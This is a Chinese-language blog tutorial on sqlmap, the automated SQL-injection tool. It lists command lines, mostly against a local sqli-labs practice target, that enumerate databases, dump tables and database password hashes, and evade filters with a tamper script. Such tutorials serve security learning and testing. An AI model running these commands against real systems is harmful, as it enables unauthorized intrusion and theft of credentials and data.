【无标题】【2023最新版】超详细Sqlmap安装保姆级教程,SQL注入使用指南,收藏这一篇就够了

一、sqlmap简介

sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等

Sqlmap采用了以下5种独特的SQL注入技术

基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入

基于时间的盲注,即不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已经执行(即页面返回时间是否增加)来判断

基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中

联合查询注入,在可以使用Union的情况下注入

堆查询注入,可以同时执行多条语句时的注入

Sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。

sqlmap是一个跨平台的工具,很好用,是SQL注入方面一个强大的工具!

常用指令
sqlmap -r http.txt #http.txt是我们抓取的http的请求包
sqlmap -r http.txt -p username #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测
sqlmap -u “http://www.xx.com/username/admin*” #如果我们已经知道admin这里是注入点的话,可以在其后面加个*来让sqlmap对其注入
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” #探测该url是否存在漏洞
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” --cookie=“抓取的cookie” #当该网站需要登录时,探测该url是否存在漏洞
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” --data=“uname=admin&passwd=admin&submit=Submit” #抓取其post提交的数据填入
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” --users #查看数据库的所有用户
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” --passwords #查看数据库用户名的密码
有时候使用 --passwords 不能获取到密码,则可以试下
-D mysql -T user -C host,user,password --dump 当MySQL< 5.7时
-D mysql -T user -C host,user,authentication_string --dump 当MySQL>= 5.7时
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” --current-user #查看数据库当前的用户
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” --is-dba #判断当前用户是否有管理员权限
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” --roles #列出数据库所有管理员角色,仅适用于oracle数据库的时候

sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” --dbs #爆出所有的数据库
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” --tables #爆出所有的数据表
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” --columns #爆出数据库中所有的列
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” --current-db #查看当前的数据库
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” -D security --tables #爆出数据库security中的所有的表
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” -D security -T users --columns #爆出security数据库中users表中的所有的列
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” -D security -T users -C username --dump #爆出数据库security中的users表中的username列中的所有数据
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” -D security -T users -C username --dump --start 1 --stop 100 #爆出数据库security中的users表中的username列中的前100条数据

sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” -D security -T users --dump-all #爆出数据库security中的users表中的所有数据
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” -D security --dump-all #爆出数据库security中的所有数据
sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” --dump-all #爆出该数据库中的所有数据

sqlmap -u “http://127.0.0.1/sqli-labs/Less-1/?id=1” --tamper=space2comment.py

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值